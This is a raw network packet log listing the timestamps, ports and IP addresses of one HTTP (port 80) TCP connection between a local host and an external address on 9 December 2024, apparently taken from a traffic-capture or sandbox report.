Dec 9, 2024 08:08:40.874017000 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.874037027 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.874073982 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.874824047 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.874871969 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.874943972 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.875061035 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.875694036 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.875736952 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.875798941 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.875838995 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.876615047 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.876668930 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.876701117 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.876743078 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.877481937 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.877530098 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.877583981 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.877624989 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.878444910 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.878494024 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.878535032 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.878581047 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.879317999 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.879359961 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.879497051 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.879542112 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.880136013 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.880189896 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.880239964 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.880317926 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.881023884 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.881104946 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.881146908 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.881933928 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.882014990 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.882062912 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.882922888 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.882966042 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.883104086 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.883694887 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.883812904 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.883858919 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.884598017 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.884670019 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.885082960 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.885499001 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.885525942 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.885546923 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.885570049 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.886410952 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.886457920 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.886499882 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.887304068 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.887351990 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.887358904 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.887453079 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.888149023 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.888230085 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.888242006 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.888278961 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.889055014 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.889098883 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.889164925 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.889205933 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.890039921 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.890083075 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.890129089 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.890167952 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.890786886 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.890832901 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.890899897 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.890949011 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.891678095 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.891724110 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.891783953 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.891832113 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:40.892581940 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:40.893343925 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.016685009 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.016777039 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.016829014 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.016865969 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.017102003 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.017178059 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.017201900 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.017242908 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.017987967 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.018096924 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.018146038 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.018860102 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.018949032 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.041378975 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.041490078 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.041567087 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.041796923 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.041855097 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.041908979 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.042732954 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.042742014 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.042851925 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.042937994 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.043593884 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.043643951 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.043930054 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.043984890 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.044059992 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.044110060 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.044800997 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.044841051 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.044977903 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.045090914 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.045651913 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.045710087 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.045778990 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.045835972 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.046662092 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.046669006 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.046713114 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.047450066 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.047497034 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.047539949 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.047581911 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.048331976 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.048376083 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.048448086 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.048527956 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.049225092 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.049303055 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.049336910 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.049398899 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.050112963 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.050188065 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.050219059 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.050270081 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.051000118 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.051083088 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.051095963 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.051156044 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.051925898 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.051981926 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.052026033 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.052071095 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.052788973 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.052830935 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.052964926 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.053005934 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.053654909 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.053697109 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.053811073 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.053889990 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.054569960 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.054615021 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.054661036 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.054747105 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.055453062 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.055497885 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.055562973 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.055603027 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.056319952 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.056392908 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.056426048 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.056516886 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.057209969 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.057285070 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.057296038 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.057415009 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.058043003 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.058129072 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.058167934 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.058310032 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.058953047 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.059037924 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.059063911 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.059201956 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.059818983 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.059864998 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.059927940 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.059983015 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.060750961 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.060795069 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.060895920 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.060981035 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.061603069 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.061671972 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.061745882 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.061758995 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.062505007 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.062552929 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.062608004 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.062685966 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.063384056 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.063523054 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.063529015 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.063713074 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.064258099 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.064347982 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.064373970 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.064626932 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.065244913 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.065320015 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.065351009 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.065416098 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.066046000 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.066096067 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.066149950 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.066239119 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.066951990 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.066994905 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.067045927 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.067089081 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.067822933 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.067869902 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.067924023 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.067975044 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.068717003 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.068768024 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.068828106 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.069624901 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.069694996 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.069716930 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.070183039 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.070487976 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.070547104 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.070594072 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.070664883 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.071393013 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.071517944 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.071574926 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.072278976 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.072352886 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.072401047 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.072442055 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.073151112 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.073199034 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.073266983 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.073309898 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.074033022 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.074135065 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.074155092 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.074193954 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.074924946 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.074975967 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.075045109 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.075103998 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.075814009 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.075855970 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.075920105 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.075964928 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.076734066 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.076776981 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.076817036 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.076873064 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.077616930 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.077673912 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.077717066 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.078037977 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.078478098 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.078593969 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.078607082 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.078635931 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.079401016 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.079463959 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.079499960 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.079885960 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.080243111 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.080281973 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.080346107 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.080399036 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.081140995 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.081280947 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.081285000 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.081322908 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.082043886 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.082145929 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.082214117 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.083007097 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.083055973 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.083072901 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.083115101 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.083816051 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.083873987 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.083894968 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.084055901 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.084682941 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.084726095 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.208849907 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.208919048 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.208934069 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.208997011 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.209258080 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.209301949 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.209367990 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.209423065 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.210155010 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.210206985 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.210257053 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.210306883 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.211029053 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.211097002 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.233484983 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.233580112 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.233592987 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.233777046 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.233906031 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.234071016 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.234081984 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.234612942 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.234761000 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.234827042 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.235099077 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.235142946 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.235204935 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.235311985 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.235950947 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.236000061 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.236041069 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.236087084 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.236870050 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.236934900 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.236944914 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.237184048 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.237740040 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.237792969 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.237834930 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.237966061 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.238619089 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.238723040 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.238729954 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.239329100 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.239573956 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.239667892 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.239685059 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.239717960 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.240375042 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.240433931 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.240483999 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.240966082 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.241264105 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.241312981 CET	49854	80	192.168.2.4	185.215.113.16
